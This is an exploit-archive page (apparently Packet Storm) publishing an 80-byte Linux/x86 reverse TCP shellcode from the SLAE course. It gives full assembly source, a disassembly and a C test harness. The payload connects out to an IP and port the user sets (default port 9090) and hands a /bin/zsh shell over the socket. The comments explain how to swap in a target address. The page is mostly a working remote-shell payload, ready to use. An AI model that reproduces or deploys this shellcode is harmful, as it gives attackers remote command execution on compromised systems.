exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 zsh Reverse TCP Shellcode Port 9090

Linux/x86 zsh Reverse TCP Shellcode Port 9090
Posted Aug 12, 2016
Authored by thryb

80 bytes small Linux/x86 zsh reverse TCP shellcode that uses port 9090.

tags | x86, tcp, shellcode
systems | linux
SHA-256 | 56debc233c9a721c245394bbd645bf53ea7df9f8ba5c7e7090e4322b6b6cc8c3

Linux/x86 zsh Reverse TCP Shellcode Port 9090

Change Mirror Download
/* 

;
; Linux x86
; Author: thryb
; Date: 21-07-16
; Purpose: Reverse /bin/zsh to TCP port 9090
; Size: 80 bytes
; ID: SLAE-770
; Git: https://www.github.com/thryb/SLAE-770
;


global _start

section .text

_start:

xor eax, eax ; cleaning registers
xor ebx, ebx

; 1 - create socket
; socket(AF_INET, SOCK_STREAM, 0);
; #define SYS_SOCKET 1 // sys_socket(2)
push eax ; null terminate
push byte 0x1 ; stack = 0, 1
push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
mov al, 0x66 ; sys_socketcall = 102
mov bl, 0x1 ; socketcall() socket = 1
mov ecx, esp ; mv stack ptr into ecx
int 0x80 ; init

xchg esi, eax ; saving sockfd

; 2 - Connect
; connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));

mov al, 0x66 ; sys_socketcall = 102
add ebx, 0x2 ; sys_connect = 3
push 0xefffff7f ; 127.255.255.254 (ip2shell.py)
push word 0x8223 ; 9090 (port2shell.py)
push word 0x2 ; 2 AF_INET
mov ecx, esp ; mv stack ptr to ecx
push 0x10 ; addr leght 16
push ecx ; ptr address
push esi ; fd
mov ecx, esp ; mv final stack ptr to ecx
int 0x80 ; init

xchg eax, esi ; save sockfd

; 3 - dup
; sys_dup2 = 63 = 0x3f

xor ecx, ecx ; NULL ecx
add cl, 0x2 ; add 2 to counter

dup2: ; STDIN, STDOUT, STDERR
mov al, 0x3f ; sys_dup2
int 0x80 ; init
dec cl ; decrement counter
jns dup2 ; Jump on No Sign (Positive)

; 4 - execve /bin/zsh
; normal execve shell exec

push eax ; null
push 0x68737a2f ; hsz/
push 0x6e69622f ; nib/
mov ebx, esp ; mv stack ptr to ebx
push eax ; null
push ebx ; push ptr addr
mov ecx, esp ; mv new stack ptr to ecx
mov al, 0xb ; sys_execve (11)
int 0x80 ; init


============================================================================================================

No NULL

./reverse-zsh-tcp-9090.bin: file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 db xor %ebx,%ebx
8048064: 50 push %eax
8048065: 6a 01 push $0x1
8048067: 6a 02 push $0x2
8048069: b0 66 mov $0x66,%al
804806b: b3 01 mov $0x1,%bl
804806d: 89 e1 mov %esp,%ecx
804806f: cd 80 int $0x80
8048071: 96 xchg %eax,%esi
8048072: b0 66 mov $0x66,%al
8048074: 83 c3 02 add $0x2,%ebx
8048077: 68 7f ff ff ef push $0xefffff7f
804807c: 66 68 23 82 pushw $0x8223
8048080: 66 6a 02 pushw $0x2
8048083: 89 e1 mov %esp,%ecx
8048085: 6a 10 push $0x10
8048087: 51 push %ecx
8048088: 56 push %esi
8048089: 89 e1 mov %esp,%ecx
804808b: cd 80 int $0x80
804808d: 96 xchg %eax,%esi
804808e: 31 c9 xor %ecx,%ecx
8048090: 80 c1 02 add $0x2,%cl

08048093 <dup2>:
8048093: b0 3f mov $0x3f,%al
8048095: cd 80 int $0x80
8048097: fe c9 dec %cl
8048099: 79 f8 jns 8048093 <dup2>
804809b: 50 push %eax
804809c: 68 2f 7a 73 68 push $0x68737a2f
80480a1: 68 2f 62 69 6e push $0x6e69622f
80480a6: 89 e3 mov %esp,%ebx
80480a8: 50 push %eax
80480a9: 53 push %ebx
80480aa: 89 e1 mov %esp,%ecx
80480ac: b0 0b mov $0xb,%al
80480ae: cd 80 int $0x80


*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x96\xb0\x66\x83\xc3\x02\x68"

// Replace IP here (use ip2shell.py to generate IP).
"\x7f\xff\xff\xef"
// *****************

"\x66\x68"

// Replace port here (use port2shell.py to generate IP).
"\x23\x82"
// *****************

"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x96\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close